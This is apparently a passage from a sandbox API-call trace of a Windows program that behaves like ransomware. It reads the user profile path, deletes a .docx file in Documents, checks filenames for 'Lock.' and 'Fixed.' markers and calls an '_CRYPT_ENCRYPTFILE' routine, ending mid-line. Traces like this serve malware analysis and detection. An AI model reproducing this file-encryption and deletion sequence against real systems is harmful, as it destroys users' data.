[0268.165] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0268.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0268.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0268.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0268.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0268.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0268.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0268.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0268.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0268.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0268.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0268.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0268.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0268.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0268.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0268.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0268.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0268.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0268.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0268.169] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0268.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0268.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.169] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0268.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0268.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0268.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0268.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0268.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0268.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0268.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0268.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0268.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0268.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0268.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0268.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e558d8 [0268.170] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/VQCf4sXQz0.docx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\VQCf4sXQz0.docx", lpFilePart=0x8cedf4*="VQCf4sXQz0.docx") returned 0x29 [0268.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0268.170] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\VQCf4sXQz0.docx" (normalized: "c:\\users\\fd1hvy\\documents\\vqcf4sxqz0.docx")) returned 0x20 [0268.170] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\VQCf4sXQz0.docx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bfe5970, ftCreationTime.dwHighDateTime=0x1d5db78, ftLastAccessTime.dwLowDateTime=0x72fe6bb0, ftLastAccessTime.dwHighDateTime=0x1d5a50a, ftLastWriteTime.dwLowDateTime=0x72fe6bb0, ftLastWriteTime.dwHighDateTime=0x1d5a50a, nFileSizeHigh=0x0, nFileSizeLow=0x731b, dwReserved0=0x1, dwReserved1=0x1c, cFileName="VQCf4sXQz0.docx", cAlternateFileName="VQCF4S~1.DOC")) returned 0xa87250 [0268.170] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\VQCf4sXQz0.docx" (normalized: "c:\\users\\fd1hvy\\documents\\vqcf4sxqz0.docx")) returned 1 [0268.174] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bfe5970, ftCreationTime.dwHighDateTime=0x1d5db78, ftLastAccessTime.dwLowDateTime=0x72fe6bb0, ftLastAccessTime.dwHighDateTime=0x1d5a50a, ftLastWriteTime.dwLowDateTime=0x72fe6bb0, ftLastWriteTime.dwHighDateTime=0x1d5a50a, nFileSizeHigh=0x0, nFileSizeLow=0x731b, dwReserved0=0x1, dwReserved1=0x1c, cFileName="VQCf4sXQz0.docx", cAlternateFileName="VQCF4S~1.DOC")) returned 0 [0268.174] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0268.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0268.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0268.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0268.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0268.174] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0268.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0268.175] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0268.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0268.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0268.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0268.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0268.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0268.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0268.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0268.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0268.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0268.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0268.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0268.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e558d8 [0268.175] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/VQCf4sXQz0.docx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\VQCf4sXQz0.docx", lpFilePart=0x8cf650*="VQCf4sXQz0.docx") returned 0x29 [0268.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0268.176] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\VQCf4sXQz0.docx" (normalized: "c:\\users\\fd1hvy\\documents\\vqcf4sxqz0.docx")) returned 0xffffffff [0268.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0268.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0268.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0268.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0268.176] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0268.176] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.176] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0268.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0268.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0268.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0268.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0268.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0268.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0268.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0268.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0268.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y89VhZ.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="89VhZ.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9VhZ.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VhZ.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hZ.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0268.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0268.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0268.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0268.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.177] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0268.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0268.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0268.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0268.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y89VhZ.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="89VhZ.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0268.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9VhZ.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0268.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VhZ.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hZ.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.178] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0268.178] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0268.178] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0268.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0268.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0268.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0268.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0268.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0268.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0268.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0268.178] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0268.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0268.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0268.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0268.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0268.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0268.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0268.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0268.179] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0268.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0268.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) 